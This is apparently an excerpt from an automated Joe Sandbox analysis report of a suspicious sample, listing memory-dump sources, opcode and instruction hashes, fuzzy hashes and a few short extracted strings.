                                                                    • Snapshot File: hcaresult_5_2_7ff849260000_containerReview.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID:
                                                                    • API String ID:
                                                                    • Opcode ID: 5e772e4e93f5959613d86325b4331a1f649750afecb8fa1b425d7b054fc07e48
                                                                    • Instruction ID: c50b39822f6ffd7ddf334475632610c28d8021ba5b057f0623556566645645cf
                                                                    • Opcode Fuzzy Hash: 5e772e4e93f5959613d86325b4331a1f649750afecb8fa1b425d7b054fc07e48
                                                                    • Instruction Fuzzy Hash: 56514E70D099AE9FEBA8DF18C490BB977B1FB58341F1041BAD01EE3691DA356E84CB50
                                                                    Memory Dump Source
                                                                    • Source File: 00000005.00000002.2240764972.00007FF848E60000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848E60000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_5_2_7ff848e60000_containerReview.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID:
                                                                    • API String ID:
                                                                    • Opcode ID: 55371ed6d5d523cc16646992b4ef2aa7aab3fbb4fd3df15af10759e2e91a2d83
                                                                    • Instruction ID: 5f1addfaa6cc4ed6b93da3506d42bf07ce14943cadf937e3d3a179a39d9d3777
                                                                    • Opcode Fuzzy Hash: 55371ed6d5d523cc16646992b4ef2aa7aab3fbb4fd3df15af10759e2e91a2d83
                                                                    • Instruction Fuzzy Hash: 2B414762A4D9656FE708B77CB0992F97781FF853A1F0C45BBD04DCB193CE2868818798
                                                                    Memory Dump Source
                                                                    • Source File: 00000005.00000002.2244233635.00007FF849260000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF849260000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_5_2_7ff849260000_containerReview.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID:
                                                                    • API String ID:
                                                                    • Opcode ID: 6789e758996718bd2f6bb8450009d4419e749c8c1de725e89d68a36c5fdbe420
                                                                    • Instruction ID: c7680b0fb871a5329587592be4982cb91e6c1e5af7042e1d9efa3af35cae3569
                                                                    • Opcode Fuzzy Hash: 6789e758996718bd2f6bb8450009d4419e749c8c1de725e89d68a36c5fdbe420
                                                                    • Instruction Fuzzy Hash: AC41A431A0C949CFEB98EF2CC496EB477E1FB68351B0405AAD00EC7582DE25EC41CB81
                                                                    Memory Dump Source
                                                                    • Source File: 00000005.00000002.2244233635.00007FF849260000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF849260000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_5_2_7ff849260000_containerReview.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID:
                                                                    • API String ID:
                                                                    • Opcode ID: a0064e5e6b4d84fd1af8ec0db5e30799276d9920e45156fedb750ff64520eab1
                                                                    • Instruction ID: cc0c77165d0de52e04ceddd3e6acd6878799bea32ade57f8334d24ecb9ec9b01
                                                                    • Opcode Fuzzy Hash: a0064e5e6b4d84fd1af8ec0db5e30799276d9920e45156fedb750ff64520eab1
                                                                    • Instruction Fuzzy Hash: 1F416131A0C949DFEB98EF28D4A5DB4B3E1FB68351B1401AAD00EC3592CE34E955CB81
                                                                    Memory Dump Source
                                                                    • Source File: 00000005.00000002.2244233635.00007FF849260000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF849260000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_5_2_7ff849260000_containerReview.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID:
                                                                    • API String ID:
                                                                    • Opcode ID: 700eec113b84adc776b18ff0496616b1b740890b8d2ad9e16d791e6ff2854288
                                                                    • Instruction ID: a46ada90430124abac7d2b6a9ee59e9022c5499785cb788ba36c70f49ba2cc71
                                                                    • Opcode Fuzzy Hash: 700eec113b84adc776b18ff0496616b1b740890b8d2ad9e16d791e6ff2854288
                                                                    • Instruction Fuzzy Hash: C8419C31608D59CFDB98EF18D459EB8B7E1EF68710B0541AAD01ED72A2DE20EC44CB91
                                                                    Memory Dump Source
                                                                    • Source File: 00000005.00000002.2244233635.00007FF849260000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF849260000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_5_2_7ff849260000_containerReview.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID:
                                                                    • API String ID:
                                                                    • Opcode ID: d3da926c5d5135c51ad3847f4d27b2496c3dab1854749fc758d1b15cbfdcd570
                                                                    • Instruction ID: 8bcc16414eb898fa90e625cab52fcdfaf4b394becf5bb2d41500a6d2c368b6ba
                                                                    • Opcode Fuzzy Hash: d3da926c5d5135c51ad3847f4d27b2496c3dab1854749fc758d1b15cbfdcd570
                                                                    • Instruction Fuzzy Hash: EC417331A0C9599FDF98EF28D465DA4B3E1FB68360B0445AAD10EC3596DE20EC45CB81
                                                                    Memory Dump Source
                                                                    • Source File: 00000005.00000002.2244233635.00007FF849260000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF849260000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_5_2_7ff849260000_containerReview.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID:
                                                                    • API String ID:
                                                                    • Opcode ID: 39b00086a3c2a31b6de89c546467e4e45c71d8732357a54f43fd3a3862974f41
                                                                    • Instruction ID: 2bc268eed70017445789d06f1a1b333a655d2122c1561ebeb17517e516b61d96
                                                                    • Opcode Fuzzy Hash: 39b00086a3c2a31b6de89c546467e4e45c71d8732357a54f43fd3a3862974f41
                                                                    • Instruction Fuzzy Hash: DA318F31A0CA45CFDB9DEF28C0A5E74B7E1FBA8350B1406A9D05AC7292CE34E941CB81
                                                                    Memory Dump Source
                                                                    • Source File: 00000005.00000002.2244233635.00007FF849260000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF849260000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_5_2_7ff849260000_containerReview.jbxd
                                                                    Memory Dump Source
                                                                    • Source File: 00000005.00000002.2240764972.00007FF848E60000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848E60000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_5_2_7ff848e60000_containerReview.jbxd
                                                                    • String ID:
                                                                    • API String ID:
                                                                    • Opcode ID: f2aebd927982e8d1957b933c9c617a3a2f396f10e438cfd981931a571288b6ef
                                                                    • Instruction ID: fe4f5b1631993158bfb30f4cec23787f4e6d7f0c157489d54b443e9b05270976
                                                                    • Opcode Fuzzy Hash: f2aebd927982e8d1957b933c9c617a3a2f396f10e438cfd981931a571288b6ef
                                                                    • Instruction Fuzzy Hash: BA21EF7190C699AFE712FB68C8452EC7FA0FF423A0F5545BAC044AB1C2DB3829898795
                                                                    Memory Dump Source
                                                                    • Source File: 00000005.00000002.2244233635.00007FF849260000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF849260000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_5_2_7ff849260000_containerReview.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID:
                                                                    • API String ID:
                                                                    • Opcode ID: 9df39718b1c0cae19e753c0fede8510e1e9f1d7ee287e46cf953e6017ea970d8
                                                                    • Instruction ID: febf4f058c5995bc2abaaf0dbcea7bede78358b3c7b8d3b3860b461de0057afc
                                                                    • Opcode Fuzzy Hash: 9df39718b1c0cae19e753c0fede8510e1e9f1d7ee287e46cf953e6017ea970d8
                                                                    • Instruction Fuzzy Hash: 65213730E1C99EAFEB98EF58D8A05ECBBB1FF58341F500479D01AE3291DA246C158B50
                                                                    Memory Dump Source
                                                                    • Source File: 00000005.00000002.2244233635.00007FF849260000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF849260000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_5_2_7ff849260000_containerReview.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID:
                                                                    • API String ID:
                                                                    • Opcode ID: 41682707014e9ac8a7b8e99918f8a3d8cf9b137ed843c55cc936cf3d467936eb
                                                                    • Instruction ID: c78f474af27bf00ec513fb0aac8d12cc12636da3f45a02805e58db7824338f0f
                                                                    • Opcode Fuzzy Hash: 41682707014e9ac8a7b8e99918f8a3d8cf9b137ed843c55cc936cf3d467936eb
                                                                    • Instruction Fuzzy Hash: EC1133306189188FDB58EF1CD855AA9B3F2FF99311F1141AFD04ED7666CB31AC458B40
                                                                    Memory Dump Source
                                                                    • Source File: 00000005.00000002.2244233635.00007FF849260000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF849260000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_5_2_7ff849260000_containerReview.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID:
                                                                    • API String ID:
                                                                    • Opcode ID: e36c1e45112ebf66a1da63c9f852e97a8e7f4b77fb85d0adc2d76bc72b19cf6d
                                                                    • Instruction ID: 6d1e4346b35a31bbadeb31654bb3dbf6619e4016f8c6169b05d128d6c7fda1b1
                                                                    • Opcode Fuzzy Hash: e36c1e45112ebf66a1da63c9f852e97a8e7f4b77fb85d0adc2d76bc72b19cf6d
                                                                    • Instruction Fuzzy Hash: 59113A32D0D7DE5FFB74AA7448442F937A1EF5A391F040177D019E7582DE686C4A83A1
                                                                    Memory Dump Source
                                                                    • Source File: 00000005.00000002.2244233635.00007FF849260000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF849260000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_5_2_7ff849260000_containerReview.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID:
                                                                    • API String ID:
                                                                    • Opcode ID: f4583aee2275f86bd8163a636021a46302e84b25abf4380f209709a9a5e9135a
                                                                    • Instruction ID: dd4289a89f824691a9449a4d24f9dea0db821521a1e11fe7fb72e35bc5f26eda
                                                                    • Opcode Fuzzy Hash: f4583aee2275f86bd8163a636021a46302e84b25abf4380f209709a9a5e9135a
                                                                    • Instruction Fuzzy Hash: 2E11E710D1C4B7CEF6799A0894A05F67292FF50382B244679D4EB8B9CAC83CFD869390
                                                                    Memory Dump Source
                                                                    • Source File: 00000005.00000002.2244233635.00007FF849260000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF849260000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_5_2_7ff849260000_containerReview.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID:
                                                                    • API String ID:
                                                                    • Opcode ID: f3130f1f588f4496f15fad8e67f5f013769c4731f5b66ccf5919cb58019fa05c
                                                                    • Instruction ID: 9b32e55c767a4cfd3676955f71ca70d0a8398e84128d6a6f0a1064c3a8d48dfd
                                                                    • Opcode Fuzzy Hash: f3130f1f588f4496f15fad8e67f5f013769c4731f5b66ccf5919cb58019fa05c
                                                                    • Instruction Fuzzy Hash: FC11A51191C8BF8EF67CBA0888A07B47255FF51342F144E75D1AB8B89ACC28BC81A280
                                                                    Memory Dump Source
                                                                    • Source File: 00000005.00000002.2244233635.00007FF849260000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF849260000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_5_2_7ff849260000_containerReview.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID:
                                                                    • API String ID:
                                                                    • Opcode ID: c1a544d4ff52c925428f882f3918326a5d279c5d11452e89218b183348235d6f
                                                                    • Instruction ID: db4da99ab8a166bf50839f073b356e7bd44db28334c72fdbe71e77b9a3c16070
                                                                    • Opcode Fuzzy Hash: c1a544d4ff52c925428f882f3918326a5d279c5d11452e89218b183348235d6f
                                                                    • Instruction Fuzzy Hash: D2118230A196188FEB58EF18D896AB9B3E1FF59311F10017FD05ED36A2CB217C418B40
                                                                    Memory Dump Source
                                                                    • Source File: 00000005.00000002.2244233635.00007FF849260000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF849260000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_5_2_7ff849260000_containerReview.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID:
                                                                    • API String ID:
                                                                    • Opcode ID: 945025bbf166632f3d62fd10ab9e3dac753478ae82de27607f5b93af1a5a2996
                                                                    • Instruction ID: 92cb925a4b27783e6dcdf4b8b3fd9fd1b230e41c03c7a530580fde64d8703179
                                                                    • Opcode Fuzzy Hash: 945025bbf166632f3d62fd10ab9e3dac753478ae82de27607f5b93af1a5a2996
                                                                    • Instruction Fuzzy Hash: 2F11A33191894A4FEF64FF28A4015F573D1FF94395F00067AD40EC3986DF29B8098655
                                                                    Memory Dump Source
                                                                    • Source File: 00000005.00000002.2244233635.00007FF849260000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF849260000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_5_2_7ff849260000_containerReview.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID:
                                                                    • API String ID:
                                                                    • Opcode ID: c0da9b883679f8000c723e667a38ce53cd11a077bea73898fc1bb1fffa0352e5
                                                                    • Instruction ID: 52341d9e24d16323ac950fbe5763b83eead46f358f4dcb758b3429a21517b406
                                                                    • Opcode Fuzzy Hash: c0da9b883679f8000c723e667a38ce53cd11a077bea73898fc1bb1fffa0352e5
                                                                    • Instruction Fuzzy Hash: 3A11CA21A1891A8FEB64FB6994015BA7391FF60392F40063AD44EC3982CF28B80986A1
                                                                    Memory Dump Source
                                                                    • Source File: 00000005.00000002.2244233635.00007FF849260000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF849260000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_5_2_7ff849260000_containerReview.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID:
                                                                    • API String ID:
                                                                    • Opcode ID: ce68a611d12d3dfb7b4b1489727fcb0177313d58001efcfa06ceed352f8e995d
                                                                    • Instruction ID: 39b885141530fbe19e6165c09f15c66a412efb6ed02e9f8d22081aff716aaab5
                                                                    • Opcode Fuzzy Hash: ce68a611d12d3dfb7b4b1489727fcb0177313d58001efcfa06ceed352f8e995d
                                                                    • Instruction Fuzzy Hash: 6D11A031A1994A8EEF64FF2894015FA73A1FF54391F00063AD45FC3992CF38B80987A5
                                                                    Memory Dump Source
                                                                    • Source File: 00000005.00000002.2240764972.00007FF848E60000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848E60000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_5_2_7ff848e60000_containerReview.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID:
                                                                    • API String ID:
                                                                    • Opcode ID: afed2b0bd37319d3596617c788645154cf78e4c6900a0da9614316893c93ac9d
                                                                    • Instruction ID: 5a5fb26b5a360e80a853b985bf0c795c75e97f94f7fe8126292690efb4c8a6ba
                                                                    • Opcode Fuzzy Hash: afed2b0bd37319d3596617c788645154cf78e4c6900a0da9614316893c93ac9d
                                                                    • Instruction Fuzzy Hash: C7113320E1CA1D4EE764BA1898592B872D1FF64350F9001B9D40EF72E3EF387D458649
                                                                    Memory Dump Source
                                                                    • Source File: 00000005.00000002.2244233635.00007FF849260000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF849260000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_5_2_7ff849260000_containerReview.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID:
                                                                    • API String ID:
                                                                    • Opcode ID: 4ed682897952bbee0d9b8ef0d7c40afc6411340334ba68a4dfcfba9811bfcf52
                                                                    • Instruction ID: 660e5faa274b574b49de0fd89f7646f1c1bab3068e3395451314c98a12c8185e
                                                                    • Opcode Fuzzy Hash: 4ed682897952bbee0d9b8ef0d7c40afc6411340334ba68a4dfcfba9811bfcf52
                                                                    • Instruction Fuzzy Hash: 7101D63160844A8FFB24FE58D4112E57391EF55392F10013BDA2DC7AC1DB39B8558B91
                                                                    Memory Dump Source
                                                                    • Source File: 00000005.00000002.2244233635.00007FF849260000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF849260000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_5_2_7ff849260000_containerReview.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID:
                                                                    • API String ID:
                                                                    • Opcode ID: 9b638261e6327ffdc38815ca25fd8fcf653c473567fa63365d30648a0f2729c3
                                                                    • Instruction ID: 7419817a31eb77f7fdca045460c0dd61e1d4d414dc619c4e1f8d13bdb5da7922
                                                                    • Opcode Fuzzy Hash: 9b638261e6327ffdc38815ca25fd8fcf653c473567fa63365d30648a0f2729c3
                                                                    • Instruction Fuzzy Hash: 5001263160854B8FFB24AE18E4107F43395EF90396F10053BE92DC3A80DB39AC548B50
                                                                    Memory Dump Source
                                                                    • Source File: 00000005.00000002.2244233635.00007FF849260000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF849260000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_5_2_7ff849260000_containerReview.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID:
                                                                    • API String ID:
                                                                    • Opcode ID: 9dcdab9702f3dcb3ff553af843e1e32d4a757a0f3fb572ecaa0503b9615fb772
                                                                    • Instruction ID: c120f503d5b2b10f5019583ed84df17e8b1063e7862cbc39abd595407439c073
                                                                    • Opcode Fuzzy Hash: 9dcdab9702f3dcb3ff553af843e1e32d4a757a0f3fb572ecaa0503b9615fb772
                                                                    • Instruction Fuzzy Hash: 4D01F53160944B8FFB29AF58E8512E57391FFA4392F10023BD92DC7A81DB39B8548B90
                                                                    Memory Dump Source
                                                                    • Source File: 00000005.00000002.2244233635.00007FF849260000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF849260000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_5_2_7ff849260000_containerReview.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID:
                                                                    • API String ID:
                                                                    • Opcode ID: 5772c3adab79322736c9f9b0321e968d206e2906764baca75920323bff873dd9
                                                                    • Instruction ID: 09d3fccd99bda7807f9edd3276b729e728a002b9b992155499751e9e33496051
                                                                    • Opcode Fuzzy Hash: 5772c3adab79322736c9f9b0321e968d206e2906764baca75920323bff873dd9
                                                                    • Instruction Fuzzy Hash: 0601B531E0D9598FEB59FBA8A4516EC77A1FF49361F14017ED01ED32C3DE2958018700
                                                                    Memory Dump Source
                                                                    • Source File: 00000005.00000002.2240764972.00007FF848E60000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848E60000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_5_2_7ff848e60000_containerReview.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID:
                                                                    • API String ID:
                                                                    • Opcode ID: abf99f9d6da5f1ee9a06b15bf328e92f7abbe2fc998a25cf68453c51e3e1192b
                                                                    • Instruction ID: f014a9776ce4ace1c321e131a013213350cba038f7e64a5605fa89d0002d1555
                                                                    • Opcode Fuzzy Hash: abf99f9d6da5f1ee9a06b15bf328e92f7abbe2fc998a25cf68453c51e3e1192b
                                                                    • Instruction Fuzzy Hash: DD01A93190D7989FE702FB68C8402D9BFB0EF42260F1545E6C084EB292D6386A488B94
                                                                    Memory Dump Source
                                                                    • Source File: 00000005.00000002.2244233635.00007FF849260000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF849260000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_5_2_7ff849260000_containerReview.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID:
                                                                    • API String ID:
                                                                    • Opcode ID: 9a9f6f7edba17942e0caaf3ea050964fc5cf9e4780f6f885ef1035712b14bb0a
                                                                    • Instruction ID: 6d889e9222c14489d8e7cb5e78a7b8082bf21e6f20955746c360d328ec5ade87
                                                                    • Opcode Fuzzy Hash: 9a9f6f7edba17942e0caaf3ea050964fc5cf9e4780f6f885ef1035712b14bb0a
                                                                    • Instruction Fuzzy Hash: 5601ED70D0899DDFDB98EF58C4A5AB8BBB1FB64741F0404ADC01DE7692DA356980CB00
                                                                    Memory Dump Source
                                                                    • Source File: 00000005.00000002.2240764972.00007FF848E60000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848E60000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_5_2_7ff848e60000_containerReview.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID:
                                                                    • API String ID:
                                                                    • Opcode ID: 05b8f81623dcae733afc4ba835cf905964f673d098c8caed54aa53849524525a
                                                                    • Instruction ID: 5b81689088e1651b8ea27da21b17f62667958134c266d0842065b5076d6c5dd7
                                                                    • Opcode Fuzzy Hash: 05b8f81623dcae733afc4ba835cf905964f673d098c8caed54aa53849524525a
                                                                    • Instruction Fuzzy Hash: 4C015A7190D7889FE706EB78C844699BFB0EF42314F1945EAD044EB2A2D6386A48C795
                                                                    Memory Dump Source
                                                                    • Source File: 00000005.00000002.2244233635.00007FF849260000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF849260000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_5_2_7ff849260000_containerReview.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID:
                                                                    • API String ID:
                                                                    • Opcode ID: 97816b313ba50a562e5a9d15e9082400c9cff46235fef3bcec67b2a7f261e4f8
                                                                    • Instruction ID: bc5224ac6a6284dfe6d4b7461d3518c4a468596d480c209071a2cd604ac23d9d
                                                                    • Opcode Fuzzy Hash: 97816b313ba50a562e5a9d15e9082400c9cff46235fef3bcec67b2a7f261e4f8
                                                                    • Instruction Fuzzy Hash: A2F0963284E2C59FE3169F7088655E53FB4FF43255F1800FAD455C74A3CA6D590AC761
                                                                    Memory Dump Source
                                                                    • Source File: 00000005.00000002.2244233635.00007FF849260000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF849260000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_5_2_7ff849260000_containerReview.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID:
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000013.00000002.2314364894.00007FF849280000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF849280000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_19_2_7ff849280000_mQBLhXIPAJ.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID: GzC$GzC$GzC
                                                                    • API String ID: 0-1231227787
                                                                    • Opcode ID: fc833ef4f224f46662c7ea7fb28bb85700805870be39da4ef1c3168adf80e66d
                                                                    • Instruction ID: fed930e6c9b9ea05c0b47c884531b6899695dae96a8fc6917c796393174d4263
                                                                    • Opcode Fuzzy Hash: fc833ef4f224f46662c7ea7fb28bb85700805870be39da4ef1c3168adf80e66d
                                                                    • Instruction Fuzzy Hash: 3081023190CA968FF778EE28945517977E1EF853D1F26067ED49FC3282DE28B8028752
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000013.00000002.2314364894.00007FF849280000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF849280000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_19_2_7ff849280000_mQBLhXIPAJ.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID: GzC$GzC$GzC
                                                                    • API String ID: 0-1231227787
                                                                    • Opcode ID: 6b57485a3fcced7166a40b3d976fdac80551688cd4e786161611826e170c144a
                                                                    • Instruction ID: cd8d012566b5dc5ce90a1d39f5873b7e161c9c879f7ac58b17fd85dab50dcfad
                                                                    • Opcode Fuzzy Hash: 6b57485a3fcced7166a40b3d976fdac80551688cd4e786161611826e170c144a
                                                                    • Instruction Fuzzy Hash: 6881F53191CAA68FF779EE18944117577E1EF46390F160A7FD49EC3182DB28B40A8792
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000013.00000002.2306690568.00007FF848E80000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848E80000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_19_2_7ff848e80000_mQBLhXIPAJ.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID: c9$!k9$"s9
                                                                    • API String ID: 0-3426396564
                                                                    • Opcode ID: e6bf74b1d6689e4a83ae90d40d4e0ea91c878e62ba1a472b45461e1a83e8e15a
                                                                    • Instruction ID: c75d19dd1440bff90666b6e73c3834fbe9e2ef524e49a33454ae36c10d1c5faa
                                                                    • Opcode Fuzzy Hash: e6bf74b1d6689e4a83ae90d40d4e0ea91c878e62ba1a472b45461e1a83e8e15a
                                                                    • Instruction Fuzzy Hash: 4F01A22671E95E8FC7426A3DB8904E8BB50EA87136B9903FBD444C7192E611585EC790
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000013.00000002.2314364894.00007FF849280000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF849280000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_19_2_7ff849280000_mQBLhXIPAJ.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID: GzC$GzC
                                                                    • API String ID: 0-2983628525
                                                                    • Opcode ID: 578293ffb5c0ce5212c083a8bec1b9250904424ed7f918ba766139afd65105c8
                                                                    • Instruction ID: 59a9b1fd54cf6cf99f5bddec598c59f45a8bde6d2ea9c8153d86815434110955
                                                                    • Opcode Fuzzy Hash: 578293ffb5c0ce5212c083a8bec1b9250904424ed7f918ba766139afd65105c8
                                                                    • Instruction Fuzzy Hash: 04D1C230A0DF968FF378EF28D494575B7E1FF44344B25467EC4AAC7A82DA29B8428741
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000013.00000002.2314364894.00007FF849280000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF849280000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_19_2_7ff849280000_mQBLhXIPAJ.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID: GzC$GzC
                                                                    • API String ID: 0-2983628525
                                                                    • Opcode ID: 3d319c858af3d06e36be77694febc9d0422d054949e18cab56a9d2d5d1c2fba5
                                                                    • Instruction ID: 4ee64951c5f564156d9a15664e4a378d82e973e060823ae895ede71934b6adff
                                                                    • Opcode Fuzzy Hash: 3d319c858af3d06e36be77694febc9d0422d054949e18cab56a9d2d5d1c2fba5
                                                                    • Instruction Fuzzy Hash: 9DA1A130A1CA8D8FEBA8EF28D8557F937D1FB58350F14422EE85DC7291CB3499458B82
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000013.00000002.2314364894.00007FF849280000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF849280000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_19_2_7ff849280000_mQBLhXIPAJ.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID: GzC$GzC
                                                                    • API String ID: 0-2983628525
                                                                    • Opcode ID: b5699c21159aa5a487d6367da5e61ebaf70fd15f10ac39812a6f5de6c0024ffb
                                                                    • Instruction ID: c6f0842ab0929d8a0958cdbb934ecd071035a185f6f0b658e000e5b00be88e67
                                                                    • Opcode Fuzzy Hash: b5699c21159aa5a487d6367da5e61ebaf70fd15f10ac39812a6f5de6c0024ffb
                                                                    • Instruction Fuzzy Hash: C6B1F37091CA968FE759EF28C0906B5B7E1FF09340F5552B9C05EC7A86CB28F851C791
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000013.00000002.2314364894.00007FF849280000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF849280000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_19_2_7ff849280000_mQBLhXIPAJ.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID: @%%I$GzC
                                                                    • API String ID: 0-3686185777
                                                                    • Opcode ID: 253f48eee43be701c709378acddafc023d81279a3ad7234818bc8e8a1cbf1bd4
                                                                    • Instruction ID: d7597e71b5bb5260f0489a5b463f795138aad2621a6c329440a9b234d0a0b0a5
                                                                    • Opcode Fuzzy Hash: 253f48eee43be701c709378acddafc023d81279a3ad7234818bc8e8a1cbf1bd4
                                                                    • Instruction Fuzzy Hash: 5151077190C89B4FF778FE1888969B937C5FF64361B1603F9D0AEC3596DE18A8068741
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000013.00000002.2314364894.00007FF849280000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF849280000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_19_2_7ff849280000_mQBLhXIPAJ.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID: GzC$GzC
